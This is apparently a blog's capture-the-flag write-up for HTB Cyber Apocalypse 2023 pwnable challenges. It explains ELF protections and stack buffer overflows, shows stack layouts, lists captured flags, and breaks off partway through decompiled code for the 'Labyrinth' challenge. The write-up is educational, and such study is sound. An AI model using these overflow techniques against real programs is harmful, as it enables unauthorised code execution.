cocay | BKISC Blogshttps://bkisc-blog.netlify.app/author/cocay/cocayWowchemy (https://wowchemy.com)en-ushttps://bkisc-blog.netlify.app/author/cocay/avatar_hu68c7ad68bdbd43a86701c7131ca39d5a_235723_270x270_fill_q75_lanczos_center.jpgcocayhttps://bkisc-blog.netlify.app/author/cocay/Cyber Apocalypse 2023: The Cursed Mission - Pwnablehttps://bkisc-blog.netlify.app/blog/bkisc/htb2023-pwn/Mon, 27 Mar 2023 00:00:00 +0000https://bkisc-blog.netlify.app/blog/bkisc/htb2023-pwn/<p> <ul class="tags-list"> <a href="https://bkisc-blog.netlify.app/tag/ctf/">ctf</a> <a href="https://bkisc-blog.netlify.app/tag/writeup/">writeup</a> <a href="https://bkisc-blog.netlify.app/tag/pwn/">pwn</a> <a href="https://bkisc-blog.netlify.app/tag/htb-2023/">htb-2023</a> </ul> <details class="toc-inpage d-print-none " open> <summary class="font-weight-bold">Table of Contents</summary> <nav id="TableOfContents"> <ul> <li><a href="#initialise-connection">Initialise Connection</a></li> <li><a href="#questionnaire">Questionnaire</a></li> <li><a href="#getting-started">Getting Started</a></li> <li><a href="#labyrinth">Labyrinth</a></li> <li><a href="#pandoras-box">Pandora&rsquo;s Box</a></li> <li><a href="#void">Void</a></li> <li><a href="#original-posts">Original Posts</a></li> </ul> </nav> </details> </p> <h2 id="initialise-connection">Initialise Connection</h2> <ul> <li> <p><strong>Description:</strong> In order to proceed, we need to start with the basics. Start an instance, connect to it via $ nc e.g. nc 127.0.0.1 1337 and send &ldquo;1&rdquo; to get the flag.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>Just a sanity check challenge, do the same thing that is being stated in the description will grant you the flag.</p> <img src="pwn1.png" alt="linux" width="1000"/> <p>Flag is: <strong>HTB{g3t_r34dy_f0r_s0m3_pwn}</strong></p> <h2 id="questionnaire">Questionnaire</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1m_j9ApZJusGOgEvGl-32JRbFyk2fpPkH/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> It&rsquo;s time to learn some things about binaries and basic c. Connect to a remote server and answer some questions to get the flag.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>We are given a binary, a C file and a netcat server to answer some questions.</p> <p>From the netcat, we are given some informations about the binary that we will going to work with.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">When compiling C/C++ source code in Linux, an ELF (Executable and Linkable Format) file is created. </span></span><span class="line"><span class="cl">The flags added when compiling can affect the binary in various ways, like the protections. </span></span><span class="line"><span class="cl">Another thing affected can be the architecture and the way it&#39;s linked. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">If the system in which the challenge is compiled is x86_64 and no flag is specified, </span></span><span class="line"><span class="cl">the ELF would be x86-64 / 64-bit. If it&#39;s compiled with a flag to indicate the system, </span></span><span class="line"><span class="cl">it can be x86 / 32-bit binary. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">To reduce its size and make debugging more difficult, the binary can be stripped or not stripped. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dynamic linking: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">A pointer to the linked file is included in the executable, and the file contents are not included </span></span><span class="line"><span class="cl">at link time. These files are used when the program is run. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Static linking: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The code for all the routines called by your program becomes part of the executable file. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Stripped: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The binary does not contain debugging information. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Not Stripped: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The binary contains debugging information. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The most common protections in a binary are: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Canary: A random value that is generated, put on the stack, and checked before that function is </span></span><span class="line"><span class="cl">left again. If the canary value is not correct-has been changed or overwritten, the application will </span></span><span class="line"><span class="cl">immediately stop. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">NX: Stands for non-executable segments, meaning we cannot write and execute code on the stack. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PIE: Stands for Position Independent Executable, which randomizes the base address of the binary </span></span><span class="line"><span class="cl">as it tells the loader which virtual address it should use. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RelRO: Stands for Relocation Read-Only. The headers of the binary are marked as read-only. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Run the &#39;file&#39; command in the terminal and &#39;checksec&#39; inside the debugger. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The output of &#39;file&#39; command: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">✗ file test </span></span><span class="line"><span class="cl">test: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, </span></span><span class="line"><span class="cl">interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=5a83587fbda6ad7b1aeee2d59f027a882bf2a429, </span></span><span class="line"><span class="cl">for GNU/Linux 3.2.0, not stripped. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The output of &#39;checksec&#39; command: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">gef➤ checksec </span></span><span class="line"><span class="cl">Canary : ✘ </span></span><span class="line"><span class="cl">NX : ✓ </span></span><span class="line"><span class="cl">PIE : ✘ </span></span><span class="line"><span class="cl">Fortify : ✘ </span></span><span class="line"><span class="cl">RelRO : Partial </span></span></code></pre></div><p>We are able to answer some first questions using these informations.</p> <img src="pwn2.png" alt="linux" width="1000"/> <img src="pwn3.png" alt="linux" width="1000"/> <img src="pwn4.png" alt="linux" width="1000"/> <img src="pwn5.png" alt="linux" width="1000"/> <p>After answering these questions correctly, we are provided with more informations about the binary.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Great job so far! Now it&#39;s time to see some C code and a binary file. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">In the pwn_questionnaire.zip there are two files: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1. test.c </span></span><span class="line"><span class="cl">2. test </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The &#39;test.c&#39; is the source code and &#39;test&#39; is the output binary. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Let&#39;s start by analyzing the code. </span></span><span class="line"><span class="cl">First of all, let&#39;s focus on the &#39;#include &lt;stdio.h&gt;&#39; line. </span></span><span class="line"><span class="cl">It includes the &#39;stdio.h&#39; header file to use some of the standard functions like &#39;printf()&#39;. </span></span><span class="line"><span class="cl">The same principle applies for the &#39;#include &lt;stdlib.h&gt;&#39; line, for other functions like &#39;system()&#39;. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Now, let&#39;s take a closer look at: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">void main(){ </span></span><span class="line"><span class="cl"> vuln(); </span></span><span class="line"><span class="cl">} </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">By default, a binary file starts executing from the &#39;main()&#39; function. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">In this case, &#39;main()&#39; only calls another function, &#39;vuln()&#39;. </span></span><span class="line"><span class="cl">The function &#39;vuln()&#39; has 3 lines. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">void vuln(){ </span></span><span class="line"><span class="cl"> char buffer[0x20] = {0}; </span></span><span class="line"><span class="cl"> fprintf(stdout, &#34;\nEnter payload here: &#34;); </span></span><span class="line"><span class="cl"> fgets(buffer, 0x100, stdin); </span></span><span class="line"><span class="cl">} </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">The first line declares a 0x20-byte buffer of characters and fills it with zeros. </span></span><span class="line"><span class="cl">The second line calls &#39;fprintf()&#39; to print a message to stdout. </span></span><span class="line"><span class="cl">Finally, the third line calls &#39;fgets()&#39; to read 0x100 bytes from stdin and store them to the </span></span><span class="line"><span class="cl">aformentioned buffer. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Then, there is a custom &#39;gg()&#39; function which calls the standard &#39;system()&#39; function to print the </span></span><span class="line"><span class="cl">flag. This function is never called by default. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">void gg(){ </span></span><span class="line"><span class="cl"> system(&#34;cat flag.txt&#34;); </span></span><span class="line"><span class="cl">} </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Run the &#39;man &lt;function_name&gt;&#39; command to see the manual page of a standard function (e.g. man fgets). </span></span></code></pre></div><p>We are also able to answer some next questions using these informations.</p> <img src="pwn6.png" alt="linux" width="1000"/> <img src="pwn7.png" alt="linux" width="1000"/> <img src="pwn8.png" alt="linux" width="1000"/> <p>After answering these questions correctly, we are provided with MORE and MORE informations about the binary.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Excellent! Now it&#39;s time to talk about Buffer Overflows. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Buffer Overflow means there is a buffer of characters, integers or any other type of variables, </span></span><span class="line"><span class="cl">and someone inserts into this buffer more bytes than it can store. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">If the user inserts more bytes than the buffer&#39;s size, they will be stored somewhere in the memory </span></span><span class="line"><span class="cl">after the address of the buffer, overwriting important addresses for the flow of the program. </span></span><span class="line"><span class="cl">This, in most cases, will make the program crash. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">When a function is called, the program knows where to return because of the &#39;return address&#39;. If the </span></span><span class="line"><span class="cl">player overwrites this address, they can redirect the flow of the program wherever they want. </span></span><span class="line"><span class="cl">To print a function&#39;s address, run &#39;p &lt;function_name&gt;&#39; inside &#39;gdb&#39;. (e.g. p main) </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">gef➤ p gg </span></span><span class="line"><span class="cl">$1 = {&lt;text variable, no debug info&gt;} 0x401176 &lt;gg&gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">To perform a Buffer Overflow in the simplest way, we take these things into consideration. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1. Canary is disabled so it won&#39;t quit after the canary address is overwritten. </span></span><span class="line"><span class="cl">2. PIE is disabled so the addresses of the binary functions are not randomized and the user knows </span></span><span class="line"><span class="cl"> where to return after overwritting the return address. </span></span><span class="line"><span class="cl">3. There is a buffer with N size. </span></span><span class="line"><span class="cl">4. There is a function that reads to this buffer more than N bytes. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Run printf &#39;A%.0s&#39; {1..30} | ./test to enter 30*&#34;A&#34; into the program. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Run the program manually with &#34;./test&#34; and insert 30*A, then 39, then 40 and see what happens. </span></span></code></pre></div><p>We are able to answer some next questions using these informations.</p> <img src="pwn9.png" alt="linux" width="1000"/> <img src="pwn10.png" alt="linux" width="1000"/> <p>For the above question, you can try out to see for yourself.</p> <img src="pwn11.png" alt="linux" width="1000"/> <p>And there is our flag!</p> <img src="pwn12.png" alt="linux" width="1000"/> <p>Flag is: <strong>HTB{th30ry_bef0r3_4cti0n}</strong></p> <h2 id="getting-started">Getting Started</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://drive.google.com/file/d/1WbbUvsAAZ--CfdrHmOggCGuLa8q_rzuV/view?usp=sharing" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> Get ready for the last guided challenge and your first real exploit. It&rsquo;s time to show your hacking skills.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Very Easy</p> </li> </ul> <p>We are given a binary, a C file and a netcat server to work with.</p> <p>Same with the above challenge, netcat tells us to fill in some questions.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Stack frame layout </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">| . | &lt;- Higher addresses </span></span><span class="line"><span class="cl">| . | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | &lt;- 64 bytes </span></span><span class="line"><span class="cl">| Return addr | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | &lt;- 56 bytes </span></span><span class="line"><span class="cl">| RBP | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | &lt;- 48 bytes </span></span><span class="line"><span class="cl">| target | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | &lt;- 40 bytes </span></span><span class="line"><span class="cl">| alignment | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | &lt;- 32 bytes </span></span><span class="line"><span class="cl">| Buffer[31] | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| . | </span></span><span class="line"><span class="cl">| . | </span></span><span class="line"><span class="cl">|_____________| </span></span><span class="line"><span class="cl">| | </span></span><span class="line"><span class="cl">| Buffer[0] | </span></span><span class="line"><span class="cl">|_____________| &lt;- Lower addresses </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> [Addr] | [Value] </span></span><span class="line"><span class="cl">-------------------+------------------- </span></span><span class="line"><span class="cl">0x00007fff1ca33230 | 0x0000000000000000 &lt;- Start of buffer </span></span><span class="line"><span class="cl">0x00007fff1ca33238 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33240 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33248 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33250 | 0x6969696969696969 &lt;- Dummy value for alignment </span></span><span class="line"><span class="cl">0x00007fff1ca33258 | 0x00000000deadbeef &lt;- Target to change </span></span><span class="line"><span class="cl">0x00007fff1ca33260 | 0x000055cf39fcf800 &lt;- Saved rbp </span></span><span class="line"><span class="cl">0x00007fff1ca33268 | 0x00007f62c548ac87 &lt;- Saved return address </span></span><span class="line"><span class="cl">0x00007fff1ca33270 | 0x0000000000000001 </span></span><span class="line"><span class="cl">0x00007fff1ca33278 | 0x00007fff1ca33348 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">After we insert 4 &#34;A&#34;s, (the hex representation of A is 0x41), the stack layout like this: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> [Addr] | [Value] </span></span><span class="line"><span class="cl">-------------------+------------------- </span></span><span class="line"><span class="cl">0x00007fff1ca33230 | 0x0000000041414141 &lt;- Start of buffer </span></span><span class="line"><span class="cl">0x00007fff1ca33238 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33240 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33248 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33250 | 0x6969696969696969 &lt;- Dummy value for alignment </span></span><span class="line"><span class="cl">0x00007fff1ca33258 | 0x00000000deadbeef &lt;- Target to change </span></span><span class="line"><span class="cl">0x00007fff1ca33260 | 0x000055cf39fcf800 &lt;- Saved rbp </span></span><span class="line"><span class="cl">0x00007fff1ca33268 | 0x00007f62c548ac87 &lt;- Saved return address </span></span><span class="line"><span class="cl">0x00007fff1ca33270 | 0x0000000000000001 </span></span><span class="line"><span class="cl">0x00007fff1ca33278 | 0x00007fff1ca33348 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">After we insert 4 &#34;B&#34;s, (the hex representation of B is 0x42), the stack layout looks like this: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> [Addr] | [Value] </span></span><span class="line"><span class="cl">-------------------+------------------- </span></span><span class="line"><span class="cl">0x00007fff1ca33230 | 0x4242424241414141 &lt;- Start of buffer </span></span><span class="line"><span class="cl">0x00007fff1ca33238 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33240 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33248 | 0x0000000000000000 </span></span><span class="line"><span class="cl">0x00007fff1ca33250 | 0x6969696969696969 &lt;- Dummy value for alignment </span></span><span class="line"><span class="cl">0x00007fff1ca33258 | 0x00000000deadbeef &lt;- Target to change </span></span><span class="line"><span class="cl">0x00007fff1ca33260 | 0x000055cf39fcf800 &lt;- Saved rbp </span></span><span class="line"><span class="cl">0x00007fff1ca33268 | 0x00007f62c548ac87 &lt;- Saved return address </span></span><span class="line"><span class="cl">0x00007fff1ca33270 | 0x0000000000000001 </span></span><span class="line"><span class="cl">0x00007fff1ca33278 | 0x00007fff1ca33348 </span></span></code></pre></div><p>From the netcat, we are provided with these informations.</p> <p>We can answer the question by looking at the informations given, where we have to overwrite the alignment address and the &ldquo;target&rsquo;s&rdquo; 0xdeadbeef value.</p> <p>From the stack layout given above, we can see that to fully overwrite, we need at least 40 bytes input (assume that we use Linux terminal because there will be a \x00 overwrite at the right of the &ldquo;target&rsquo;s&rdquo; 0xdeadbeef value) which will look like this.</p> <img src="pwn13.png" alt="linux" width="1000"/> <p>I don&rsquo;t know why it prints out <strong>&quot;[-] You failed!&quot;</strong> though&hellip;</p> <p>Flag is: <strong>HTB{b0f_s33m5_3z_r1ght?}</strong></p> <h2 id="labyrinth">Labyrinth</h2> <ul> <li> <p><strong>Given file:</strong> <a href="https://github.com/padolex/misc/blob/main/pwn_labyrinth.zip" target="_blank" rel="noopener">Get it here!</a></p> </li> <li> <p><strong>Description:</strong> You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.</p> </li> <li> <p><strong>Note:</strong> This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.</p> </li> <li> <p><strong>Category:</strong> Binary Exploitation/Pwnable</p> </li> <li> <p><strong>Difficulty:</strong> Easy</p> </li> </ul> <p>Examine the binary with command <code>checksec</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-zsh" data-lang="zsh"><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> <span class="s1">&#39;~/pwn_labyrinth/challenge/labyrinth&#39;</span> </span></span><span class="line"><span class="cl"> Arch: amd64-64-little </span></span><span class="line"><span class="cl"> RELRO: Full RELRO </span></span><span class="line"><span class="cl"> Stack: No canary found </span></span><span class="line"><span class="cl"> NX: NX enabled </span></span><span class="line"><span class="cl"> PIE: No PIE <span class="o">(</span>0x400000<span class="o">)</span> </span></span><span class="line"><span class="cl"> RUNPATH: b<span class="s1">&#39;./glibc/&#39;</span> </span></span></code></pre></div><p>Use IDA Pro to analyze, we obtain the following pseudocode for function <code>escape_plan</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">escape_plan</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">buf</span><span class="p">;</span> <span class="c1">// [rsp+Bh] [rbp-5h] BYREF </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">int</span> <span class="n">fd</span><span class="p">;</span> <span class="c1">// [rsp+Ch] [rbp-4h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> </span></span><span class="line"><span class="cl"> <span class="n">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span><span class="o">&amp;</span><span class="n">unk_402018</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">,</span> <span class="mh">0x1F0uLL</span><span class="p">,</span> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="n">_bss_start</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">%sCongratulations on escaping! Here is a sacred spell to help you continue your journey: %s</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\x1B</span><span class="s">[1;32m&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\x1B</span><span class="s">[0m&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;./flag.txt&#34;</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">perror</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">Error opening flag.txt, please contact an Administrator.</span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fputc</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><p>Our goal is to be able to execute this function, now examine the <code>main</code> function</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">int</span> <span class="kr">__cdecl</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">**</span><span class="n">envp</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">char</span> <span class="n">v4</span><span class="p">[</span><span class="mi">8</span><span class="p">];</span> <span class="c1">// [rsp+0h] [rbp-30h] BYREF </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v5</span><span class="p">;</span> <span class="c1">// [rsp+8h] [rbp-28h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v6</span><span class="p">;</span> <span class="c1">// [rsp+10h] [rbp-20h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kr">__int64</span> <span class="n">v7</span><span class="p">;</span> <span class="c1">// [rsp+18h] [rbp-18h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">char</span> <span class="o">*</span><span class="n">s</span><span class="p">;</span> <span class="c1">// [rsp+20h] [rbp-10h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> <span class="kt">unsigned</span> <span class="kr">__int64</span> <span class="n">i</span><span class="p">;</span> <span class="c1">// [rsp+28h] [rbp-8h] </span></span></span><span class="line"><span class="cl"><span class="c1"></span> </span></span><span class="line"><span class="cl"> <span class="n">setup</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span> <span class="n">argv</span><span class="p">,</span> <span class="n">envp</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">banner</span><span class="p">();</span> </span></span><span class="line"><span class="cl"> <span class="o">*</span><span class="p">(</span><span class="n">_QWORD</span> <span class="o">*</span><span class="p">)</span><span class="n">v4</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v5</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v6</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">v7</span> <span class="o">=</span> <span class="mi">0LL</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">Select door: </span><span class="se">\n\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">,</span> <span class="mh">0x10uLL</span><span class="p">,</span> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1LL</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mh">0x64</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">&gt;</span> <span class="mi">9</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="n">i</span> <span class="o">&gt;</span> <span class="mh">0x63</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="s">&#34;Door: %d &#34;</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="s">&#34;Door: 0%d &#34;</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">fprintf</span><span class="p">(</span><span class="n">_bss_start</span><span class="p">,</span> <span class="s">&#34;Door: 00%d &#34;</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="p">(</span><span class="n">i</span> <span class="o">%</span> <span class="mh">0xA</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">i</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">putchar</span><span class="p">(</span><span class="mi">10</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span><span class="s">&#34;</span><span class="se">\n</span><span class="s">&gt;&gt; &#34;</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">,</span> <span class="mi">4uLL</span><span class="p">,</span> <span class="n">_bss_start</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">s</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span><span class="n">malloc</span><span class="p">(</span><span class="mh">0x10uLL</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="n">fgets</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">strncmp</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="s">&#34;69&#34;</span><span class="p">,</span> <span class="mi">2uLL</span><span class="p">)</span> <span class="o">||</span> <span class="o">!</span><span class="n">strncmp</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="s">&#34;069&#34;</span><span class="p">,</span> <span class="mi">3uLL</span><span class="p">)</span> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="n">fwrite</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;</span><span class="se">\n</span><span class="s">&#34;</span> </span></span><span class="line"><span class="cl"> <span class="s">&#34;You are heading to open the door but you suddenly see something on the 